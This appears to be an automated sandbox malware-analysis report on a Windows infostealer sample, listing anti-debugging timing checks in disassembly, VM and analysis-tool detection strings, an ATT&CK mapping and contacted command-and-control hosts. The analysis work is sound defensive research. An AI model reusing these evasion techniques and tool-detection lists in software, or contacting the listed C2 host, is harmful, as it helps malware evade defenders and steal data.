Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0F92 second address: 75B0FE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F930851C688h 0x00000009 sbb eax, 09F2ACF8h 0x0000000f jmp 00007F930851C67Bh 0x00000014 popfd 0x00000015 mov bh, al 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a js 00007F937844AD60h 0x00000020 jmp 00007F930851C67Bh 0x00000025 mov eax, dword ptr [ebp-14h] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d mov esi, ebx 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0FE1 second address: 75B0FE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0FE7 second address: 75B10A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C684h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d pushad 0x0000000e push ecx 0x0000000f movsx edx, si 0x00000012 pop esi 0x00000013 push ebx 0x00000014 pushfd 0x00000015 jmp 00007F930851C682h 0x0000001a adc eax, 0DC0CC18h 0x00000020 jmp 00007F930851C67Bh 0x00000025 popfd 0x00000026 pop eax 0x00000027 popad 0x00000028 mov dword ptr [esi+0Ch], eax 0x0000002b jmp 00007F930851C67Fh 0x00000030 mov edx, 775606ECh 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F930851C684h 0x0000003c adc ecx, 1ABE2DA8h 0x00000042 jmp 00007F930851C67Bh 0x00000047 popfd 0x00000048 mov dl, al 0x0000004a popad 0x0000004b mov eax, 00000000h 0x00000050 jmp 00007F930851C680h 0x00000055 lock cmpxchg dword ptr [edx], ecx 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F930851C687h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B10A5 second address: 75B10E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 2981EB5Ah 0x00000008 pushfd 0x00000009 jmp 00007F9308CAD92Bh 0x0000000e sbb eax, 6A99B0FEh 0x00000014 jmp 00007F9308CAD939h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B10E3 second address: 75B10E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B10E7 second address: 75B10FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD92Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B10FA second address: 75B1139 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C689h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007F930851C67Ah 0x00000014 sub ecx, 09D64988h 0x0000001a jmp 00007F930851C67Bh 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1139 second address: 75B1184 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F9308CAD935h 0x0000000d sub esi, 7904A8A6h 0x00000013 jmp 00007F9308CAD931h 0x00000018 popfd 0x00000019 popad 0x0000001a jne 00007F9378BDBE93h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F9308CAD92Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1184 second address: 75B120B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C681h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+08h] 0x0000000c jmp 00007F930851C67Eh 0x00000011 mov eax, dword ptr [esi] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F930851C67Eh 0x0000001a add cx, E3D8h 0x0000001f jmp 00007F930851C67Bh 0x00000024 popfd 0x00000025 mov esi, 42E22A8Fh 0x0000002a popad 0x0000002b mov dword ptr [edx], eax 0x0000002d jmp 00007F930851C682h 0x00000032 mov eax, dword ptr [esi+04h] 0x00000035 jmp 00007F930851C680h 0x0000003a mov dword ptr [edx+04h], eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F930851C67Ah 0x00000046 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B120B second address: 75B1211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1211 second address: 75B1300 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C67Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+08h] 0x0000000c jmp 00007F930851C680h 0x00000011 mov dword ptr [edx+08h], eax 0x00000014 pushad 0x00000015 movzx esi, bx 0x00000018 jmp 00007F930851C683h 0x0000001d popad 0x0000001e mov eax, dword ptr [esi+0Ch] 0x00000021 jmp 00007F930851C686h 0x00000026 mov dword ptr [edx+0Ch], eax 0x00000029 jmp 00007F930851C680h 0x0000002e mov eax, dword ptr [esi+10h] 0x00000031 pushad 0x00000032 mov ax, 9DCDh 0x00000036 jmp 00007F930851C67Ah 0x0000003b popad 0x0000003c mov dword ptr [edx+10h], eax 0x0000003f jmp 00007F930851C680h 0x00000044 mov eax, dword ptr [esi+14h] 0x00000047 jmp 00007F930851C680h 0x0000004c mov dword ptr [edx+14h], eax 0x0000004f jmp 00007F930851C680h 0x00000054 mov eax, dword ptr [esi+18h] 0x00000057 jmp 00007F930851C680h 0x0000005c mov dword ptr [edx+18h], eax 0x0000005f jmp 00007F930851C680h 0x00000064 mov eax, dword ptr [esi+1Ch] 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F930851C67Ah 0x00000070 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1300 second address: 75B1304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1304 second address: 75B130A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B130A second address: 75B1325 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD92Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+1Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1325 second address: 75B1329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1329 second address: 75B132F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B132F second address: 75B1335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1335 second address: 75B1339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1339 second address: 75B133D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B133D second address: 75B1387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+20h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F9308CAD938h 0x00000012 jmp 00007F9308CAD935h 0x00000017 popfd 0x00000018 push eax 0x00000019 mov bx, 12C2h 0x0000001d pop ebx 0x0000001e popad 0x0000001f mov dword ptr [edx+20h], eax 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1387 second address: 75B138B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1469 second address: 75B1492 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d pushad 0x0000000e movzx eax, bx 0x00000011 push eax 0x00000012 push edx 0x00000013 mov al, dl 0x00000015 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1492 second address: 75B14B8 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 2DFC4F37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ax, word ptr [esi+32h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F930851C684h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B14B8 second address: 75B14BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B14BC second address: 75B14C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B14C2 second address: 75B14DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD92Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B14DD second address: 75B14E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 02h 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B14E4 second address: 75B14EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B14EA second address: 75B151C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+34h] 0x0000000b jmp 00007F930851C683h 0x00000010 mov dword ptr [edx+34h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F930851C67Bh 0x0000001b mov ebx, esi 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B151C second address: 75B1555 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, 00000700h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F9308CAD935h 0x00000016 pop ecx 0x00000017 jmp 00007F9308CAD931h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1555 second address: 75B155B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSpecial instruction interceptor: First address: F1B927 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSpecial instruction interceptor: First address: 10C5146 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSpecial instruction interceptor: First address: 10C3958 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSpecial instruction interceptor: First address: 10EE743 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSpecial instruction interceptor: First address: 10D6ED4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSpecial instruction interceptor: First address: F1B8FD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSpecial instruction interceptor: First address: 115957D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeCode function: 0_2_0758035B rdtsc 0_2_0758035B
Source: C:\Users\user\Desktop\iuO4kwUi17.exeAPI coverage: 2.8 %
Source: C:\Users\user\Desktop\iuO4kwUi17.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\iuO4kwUi17.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: iuO4kwUi17.exe, iuO4kwUi17.exe, 00000000.00000002.1917918780.00000000010A6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.5.drBinary or memory string: VMware
Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: iuO4kwUi17.exe, 00000000.00000003.1486182856.0000000006E11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=
Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.drBinary or memory string: vmci.sys
Source: iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: iuO4kwUi17.exe, 00000000.00000002.1918748214.0000000001C6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllOaZx{+P
Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.5.drBinary or memory string: VMware20,1
Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: iuO4kwUi17.exe, 00000000.00000002.1917918780.00000000010A6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\iuO4kwUi17.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\iuO4kwUi17.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\iuO4kwUi17.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\iuO4kwUi17.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\iuO4kwUi17.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\iuO4kwUi17.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\iuO4kwUi17.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\iuO4kwUi17.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\iuO4kwUi17.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\iuO4kwUi17.exeFile opened: NTICE
Source: C:\Users\user\Desktop\iuO4kwUi17.exeFile opened: SICE
Source: C:\Users\user\Desktop\iuO4kwUi17.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\iuO4kwUi17.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeCode function: 0_2_0758035B rdtsc 0_2_0758035B
Source: iuO4kwUi17.exe, iuO4kwUi17.exe, 00000000.00000002.1917918780.00000000010A6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 2Program Manager
Source: C:\Users\user\Desktop\iuO4kwUi17.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe
Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Leaks process information
Source: global trafficTCP traffic: 192.168.2.10:49704 -> 185.121.15.192:80
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 185.121.15.192:80
Source: global trafficTCP traffic: 192.168.2.10:49706 -> 185.121.15.192:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		2
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		2
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Obfuscated Files or Information		Security Account Manager12
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Software Packing		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets214
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
iuO4kwUi17.exe47%ReversingLabsWin32.Infostealer.Tinba
iuO4kwUi17.exe100%AviraTR/Crypt.TPM.Gen
iuO4kwUi17.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fivetk5ht.top
185.121.15.192
truefalse
    		high
    httpbin.org
    		98.85.100.80
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmliuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            http://html4/loose.dtdiuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpiuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                https://httpbin.org/ipbeforeiuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpfalse
                  		high
                  https://curl.se/docs/http-cookies.htmliuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpfalse
                    		high
                    http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv173457985135a1iuO4kwUi17.exe, 00000000.00000002.1918748214.0000000001BEE000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high
                        http://upx.sf.netAmcache.hve.5.drfalse
                          		high
                          https://curl.se/docs/alt-svc.htmliuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high
                            http://.cssiuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpfalse
                              		high
